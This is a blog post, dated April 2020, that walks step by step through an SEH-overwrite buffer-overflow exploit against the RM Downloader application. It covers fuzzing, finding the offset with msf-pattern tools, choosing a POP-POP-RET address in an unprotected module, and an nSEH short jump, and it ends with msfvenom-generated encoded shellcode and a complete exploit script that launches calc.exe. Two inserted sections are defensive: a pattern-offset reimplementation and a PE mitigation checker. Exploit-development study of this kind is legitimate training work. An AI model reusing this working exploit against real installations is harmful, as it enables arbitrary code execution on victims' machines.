Kev, posted April 23, 2020

Preamble

The other day I was looking through Exploit-DB as usual, when I came across this exploit. Interested, I was eager to find out whether I could find a vulnerability myself. Having succeeded, I will explain the finding.

The Bug

RM Downloader suffers from a buffer overflow and a Structured Exception Handler (SEH) overwrite when a long string is entered in the 'Load' parameter. A small fuzzing script generates the input:

import struct

# Constructed input: 10000 'A' bytes, enough to overrun the buffer.
buffer = b"A" * 10000
f = open("poc.txt", "wb")
f.write(buffer)
f.close()

Once the script is executed, the file poc.txt is created.

To crash the application with the generated bytes, open the 'Load' tab and paste the contents of poc.txt into the 'Load' parameter. Then click OK. Two additional message boxes may appear; just click OK on them. After this, the application crashes:

Voila! EIP has been overwritten. Moreover, the SEH chain has been overwritten as well:

This application could easily be exploited with a JMP/CALL ESP or a PUSH ESP; RET. However, as I like SEH overwrites more, I will perform one in this case.
A pattern is generated and saved into a file named "pattern":

root@whitecr0wz:~/Exploit-Dev# msf-pattern_create -l 10000 > pattern
root@whitecr0wz:~/Exploit-Dev#

The contents of the file "pattern" are copied and pasted into the 'Load' parameter, repeating the process. After the SEH chain values have been overwritten, the nSEH value is copied:

The offset is calculated with msf-pattern_offset:

root@whitecr0wz:~/Exploit-Dev# msf-pattern_offset -q 336F4C32 -l 10000
[*] Exact match at offset 9008
root@whitecr0wz:~/Exploit-Dev#

The PoC is updated:

import struct

# 9008 bytes of padding reach nSEH; the next 4 bytes land in nSEH and the 4 after that in SEH.
buffer = b"A" * 9008 + b"BBBB" + b"CCCC"
f = open("poc.txt", "wb")
f.write(buffer)
f.close()

If the script works as intended, the nSEH value should be 42424242 (BBBB) and the SEH value 43434343 (CCCC):

Good. In a scenario like this, a 3-byte SEH overwrite could be performed in case there are no usable addresses without a NULL byte. The loaded modules are listed:

As seen, the module RDfilter03 does not have any protections or mitigations. Moreover, its base address does not contain a NULL byte. Listing the POP-POP-RETN sequences:

The first address (0x10031779) was chosen.
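How msf-pattern_offset turns the value copied from nSEH into the offset 9008: the pattern is a run of unique three-character triples (uppercase letter, lowercase letter, digit), so any four consecutive bytes read out of the debugger identify exactly one position in the input. The value shown in the SEH chain, 336F4C32, is the little-endian reading of the bytes 32 4C 6F 33, i.e. the text "2Lo3". The following script is an added example for crash triage and not part of the original post; it reimplements the pattern generation and the lookup, and the function names cyclic_pattern and pattern_offset are my own.

```python
import string
import struct


def cyclic_pattern(length):
    """Build the Metasploit-style pattern: consecutive 3-char triples (Upper, lower, digit), all unique."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    raise ValueError("pattern longer than %d bytes is not unique" % (26 * 26 * 10 * 3))


def pattern_offset(value, length=10000):
    """Map a 32-bit value read from the debugger (hex string or int) back to its offset in the pattern.

    The register or SEH value is the little-endian interpretation of four pattern bytes,
    so it is repacked with "<I" before searching. Returns -1 if the value is not from the pattern.
    """
    if isinstance(value, str):
        value = int(value, 16)
    needle = struct.pack("<I", value).decode("latin-1")
    return cyclic_pattern(length).find(needle)


if __name__ == "__main__":
    # Value observed in nSEH in the write-up: 336F4C32 -> bytes 32 4C 6F 33 -> "2Lo3"
    print(pattern_offset("336F4C32"))  # 9008
```

A result of -1 means the four bytes did not come from the pattern (for example, they are padding or a pointer into the program itself), which is the same situation in which msf-pattern_offset reports no match; a value that only matches when read big-endian usually indicates the bytes were copied from a dump in the wrong byte order.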
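The observation that RDfilter03 ships without any mitigations is a claim a defender should be able to verify on the module file itself rather than only in a debugger. The script below is an added example and not code from the original post: check_mitigations() reads the DllCharacteristics flags from the PE optional header (ASLR, DEP, NO_SEH, CFG) and, for 32-bit images, the SEHandlerTable/SEHandlerCount fields of the Load Config directory that turn SafeSEH on. Because no real module can be bundled here, build_sample_pe() constructs a minimal synthetic PE32 DLL in memory as test input; the function names, the sample's image base 0x10000000 and its section layout are constructed for the example.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification
DYNAMIC_BASE = 0x0040  # image may be relocated at load time (ASLR)
NX_COMPAT = 0x0100     # image is compatible with DEP
NO_SEH = 0x0400        # image contains no SEH handlers at all
GUARD_CF = 0x4000      # Control Flow Guard instrumentation present

LOAD_CONFIG_DIR = 10   # data directory index of IMAGE_LOAD_CONFIG_DIRECTORY


def _rva_to_offset(rva, sections):
    """Translate an RVA to a file offset using the section table."""
    for va, vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    return None


def check_mitigations(data):
    """Return which exploit mitigations a PE image opts into (data = raw file bytes)."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image: missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:            # PE32
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
        data_dir = opt + 96
    elif magic == 0x20B:          # PE32+
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
        data_dir = opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]

    # Section table follows the optional header; 40-byte entries, sizes/addresses start at +8
    sections = []
    sec = opt + opt_size
    for i in range(nsections):
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", data, sec + i * 40 + 8)
        sections.append((va, vsize, raw_ptr, raw_size))

    # SafeSEH (32-bit only): the load config lists the only handlers the OS will dispatch to
    safeseh = False
    lc_rva, lc_size = struct.unpack_from("<II", data, data_dir + LOAD_CONFIG_DIR * 8)
    if magic == 0x10B and lc_rva and lc_size >= 72:
        lc_off = _rva_to_offset(lc_rva, sections)
        if lc_off is not None:
            table, count = struct.unpack_from("<II", data, lc_off + 64)
            safeseh = table != 0 and count != 0

    return {
        "image_base": image_base,
        "aslr": bool(dll_chars & DYNAMIC_BASE),
        "dep": bool(dll_chars & NX_COMPAT),
        "no_seh": bool(dll_chars & NO_SEH),
        "cfg": bool(dll_chars & GUARD_CF),
        "safeseh": safeseh,
    }


def build_sample_pe(dll_chars, with_safeseh):
    """Construct a minimal synthetic PE32 DLL in memory (constructed test input, not a real module)."""
    FILE_ALIGN = 0x200
    rdata_rva, rdata_raw = 0x1000, 0x200
    load_config = bytearray(72)
    struct.pack_into("<I", load_config, 0, 72)                          # Size
    if with_safeseh:
        struct.pack_into("<II", load_config, 64, rdata_rva + 0x100, 3)  # SEHandlerTable, SEHandlerCount
    rdata = bytes(load_config) + bytes(FILE_ALIGN - len(load_config))

    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                             # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x2102)     # i386, 1 section, DLL
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                               # PE32 magic
    struct.pack_into("<I", opt, 28, 0x10000000)                         # ImageBase (constructed)
    struct.pack_into("<II", opt, 32, 0x1000, FILE_ALIGN)                # Section/File alignment
    struct.pack_into("<H", opt, 70, dll_chars)
    struct.pack_into("<I", opt, 92, 16)                                 # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + LOAD_CONFIG_DIR * 8, rdata_rva, 72)
    section = bytearray(40)
    section[:6] = b".rdata"
    struct.pack_into("<IIII", section, 8, len(rdata), rdata_rva, len(rdata), rdata_raw)
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(section)
    return headers + bytes(rdata_raw - len(headers)) + rdata


if __name__ == "__main__":
    print(check_mitigations(build_sample_pe(0, False)))                        # everything False
    print(check_mitigations(build_sample_pe(DYNAMIC_BASE | NX_COMPAT, True)))  # aslr, dep, safeseh True
```

On a real module, call check_mitigations(open(path, "rb").read()). A result where aslr, dep and safeseh are all False describes exactly the kind of module the write-up relies on for its POP-POP-RET address, and it is what a defender should report to the vendor or compensate for with system-wide DEP, mandatory ASLR and SEHOP policy, which do not depend on the module opting in.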
The PoC is updated:

import struct

# nSEH: JO +8 / JNO +6 pair, i.e. an unconditional short jump over the SEH record into the bytes that follow
nseh = struct.pack("<I", 0x06710870)
# SEH: POP POP RET in RDfilter03 (no SafeSEH, base address without a NULL byte)
seh = struct.pack("<I", 0x10031779)
buffer = b"A" * 9008 + nseh + seh + b"\xff" * 200
f = open("poc.txt", "wb")
f.write(buffer)
f.close()

After repeating the process, the SEH chain values are overwritten as expected:

After pressing SHIFT+F9 (Run), the additional bytes are executed:

Shellcode is generated:

root@whitecr0wz:~/Exploit-Dev# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_mixed
x86/alpha_mixed succeeded with size 448 (iteration=0)
x86/alpha_mixed chosen with final size 448
Payload size: 448 bytes
Final size of py file: 2188 bytes
buf =  b""
buf += b"\x89\xe6\xdb\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6a\x48\x6b"
buf += b"\x32\x37\x70\x53\x30\x45\x50\x71\x70\x4c\x49\x79\x75"
buf += b"\x75\x61\x6b\x70\x32\x44\x4c\x4b\x72\x70\x74\x70\x6c"
buf += b"\x4b\x53\x62\x46\x6c\x6c\x4b\x33\x62\x45\x44\x6c\x4b"
buf += b"\x30\x72\x76\x48\x36\x6f\x6e\x57\x53\x7a\x64\x66\x70"
buf += b"\x31\x49\x6f\x4e\x4c\x75\x6c\x45\x31\x33\x4c\x67\x72"
buf += b"\x54\x6c\x71\x30\x4a\x61\x4a\x6f\x56\x6d\x46\x61\x59"
buf += b"\x57\x6a\x42\x59\x62\x66\x32\x73\x67\x6e\x6b\x66\x32"
buf += b"\x42\x30\x6c\x4b\x32\x6a\x45\x6c\x4e\x6b\x32\x6c\x56"
buf += b"\x71\x63\x48\x68\x63\x50\x48\x35\x51\x6e\x31\x72\x71"
buf += b"\x4c\x4b\x52\x79\x47\x50\x67\x71\x79\x43\x6e\x6b\x31"
buf += b"\x59\x64\x58\x5a\x43\x77\x4a\x32\x69\x4e\x6b\x65\x64"
buf += b"\x4e\x6b\x75\x51\x68\x56\x56\x51\x6b\x4f\x4c\x6c\x39"
buf += b"\x51\x38\x4f\x64\x4d\x35\x51\x4f\x37\x57\x48\x49\x70"
buf += b"\x51\x65\x59\x66\x55\x53\x71\x6d\x49\x68\x35\x6b\x73"
buf += b"\x4d\x45\x74\x63\x45\x6b\x54\x32\x78\x4e\x6b\x42\x78"
buf += b"\x36\x44\x56\x61\x48\x53\x43\x56\x6c\x4b\x46\x6c\x52"
buf += b"\x6b\x4c\x4b\x63\x68\x47\x6c\x47\x71\x48\x53\x4e\x6b"
buf += b"\x77\x74\x6e\x6b\x55\x51\x58\x50\x4f\x79\x63\x74\x45"
buf += b"\x74\x36\x44\x31\x4b\x31\x4b\x31\x71\x72\x79\x43\x6a"
buf += b"\x53\x61\x6b\x4f\x6b\x50\x63\x6f\x43\x6f\x42\x7a\x4c"
buf += b"\x4b\x65\x42\x7a\x4b\x4e\x6d\x53\x6d\x33\x5a\x57\x71"
buf += b"\x4e\x6d\x6d\x55\x4f\x42\x53\x30\x37\x70\x67\x70\x50"
buf += b"\x50\x73\x58\x50\x31\x4e\x6b\x42\x4f\x6d\x57\x49\x6f"
buf += b"\x78\x55\x6f\x4b\x69\x70\x75\x4d\x46\x4a\x77\x7a\x43"
buf += b"\x58\x6e\x46\x4e\x75\x6f\x4d\x4d\x4d\x79\x6f\x49\x45"
buf += b"\x55\x6c\x34\x46\x61\x6c\x76\x6a\x6b\x30\x39\x6b\x4d"
buf += b"\x30\x71\x65\x64\x45\x6f\x4b\x42\x67\x65\x43\x43\x42"
buf += b"\x42\x4f\x61\x7a\x45\x50\x31\x43\x6b\x4f\x7a\x75\x63"
buf += b"\x53\x33\x51\x62\x4c\x73\x53\x56\x4e\x51\x75\x31\x68"
buf += b"\x53\x55\x35\x50\x41\x41"

EndGame

Final Code:

import struct

# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread
# Payload size: 448 bytes
buf =  b""
buf += b"\x89\xe6\xdb\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6a\x48\x6b"
buf += b"\x32\x37\x70\x53\x30\x45\x50\x71\x70\x4c\x49\x79\x75"
buf += b"\x75\x61\x6b\x70\x32\x44\x4c\x4b\x72\x70\x74\x70\x6c"
buf += b"\x4b\x53\x62\x46\x6c\x6c\x4b\x33\x62\x45\x44\x6c\x4b"
buf += b"\x30\x72\x76\x48\x36\x6f\x6e\x57\x53\x7a\x64\x66\x70"
buf += b"\x31\x49\x6f\x4e\x4c\x75\x6c\x45\x31\x33\x4c\x67\x72"
buf += b"\x54\x6c\x71\x30\x4a\x61\x4a\x6f\x56\x6d\x46\x61\x59"
buf += b"\x57\x6a\x42\x59\x62\x66\x32\x73\x67\x6e\x6b\x66\x32"
buf += b"\x42\x30\x6c\x4b\x32\x6a\x45\x6c\x4e\x6b\x32\x6c\x56"
buf += b"\x71\x63\x48\x68\x63\x50\x48\x35\x51\x6e\x31\x72\x71"
buf += b"\x4c\x4b\x52\x79\x47\x50\x67\x71\x79\x43\x6e\x6b\x31"
buf += b"\x59\x64\x58\x5a\x43\x77\x4a\x32\x69\x4e\x6b\x65\x64"
buf += b"\x4e\x6b\x75\x51\x68\x56\x56\x51\x6b\x4f\x4c\x6c\x39"
buf += b"\x51\x38\x4f\x64\x4d\x35\x51\x4f\x37\x57\x48\x49\x70"
buf += b"\x51\x65\x59\x66\x55\x53\x71\x6d\x49\x68\x35\x6b\x73"
buf += b"\x4d\x45\x74\x63\x45\x6b\x54\x32\x78\x4e\x6b\x42\x78"
buf += b"\x36\x44\x56\x61\x48\x53\x43\x56\x6c\x4b\x46\x6c\x52"
buf += b"\x6b\x4c\x4b\x63\x68\x47\x6c\x47\x71\x48\x53\x4e\x6b"
buf += b"\x77\x74\x6e\x6b\x55\x51\x58\x50\x4f\x79\x63\x74\x45"
buf += b"\x74\x36\x44\x31\x4b\x31\x4b\x31\x71\x72\x79\x43\x6a"
buf += b"\x53\x61\x6b\x4f\x6b\x50\x63\x6f\x43\x6f\x42\x7a\x4c"
buf += b"\x4b\x65\x42\x7a\x4b\x4e\x6d\x53\x6d\x33\x5a\x57\x71"
buf += b"\x4e\x6d\x6d\x55\x4f\x42\x53\x30\x37\x70\x67\x70\x50"
buf += b"\x50\x73\x58\x50\x31\x4e\x6b\x42\x4f\x6d\x57\x49\x6f"
buf += b"\x78\x55\x6f\x4b\x69\x70\x75\x4d\x46\x4a\x77\x7a\x43"
buf += b"\x58\x6e\x46\x4e\x75\x6f\x4d\x4d\x4d\x79\x6f\x49\x45"
buf += b"\x55\x6c\x34\x46\x61\x6c\x76\x6a\x6b\x30\x39\x6b\x4d"
buf += b"\x30\x71\x65\x64\x45\x6f\x4b\x42\x67\x65\x43\x43\x42"
buf += b"\x42\x4f\x61\x7a\x45\x50\x31\x43\x6b\x4f\x7a\x75\x63"
buf += b"\x53\x33\x51\x62\x4c\x73\x53\x56\x4e\x51\x75\x31\x68"
buf += b"\x53\x55\x35\x50\x41\x41"

# nSEH: JO +8 / JNO +6 pair, an unconditional short jump over the SEH record
nseh = struct.pack("<I", 0x06710870)
# SEH: POP POP RET in RDfilter03
seh = struct.pack("<I", 0x10031779)
# "\x41\x49" * 5: 10-byte INC ECX / DEC ECX pad that the short jump lands in, before the encoded payload
buffer = b"A" * 9008 + nseh + seh + b"\x41\x49" * 5 + buf + b"\xff" * 200
f = open("poc.txt", "wb")
f.write(buffer)
f.close()

Source: hwhitecr0wz.github.io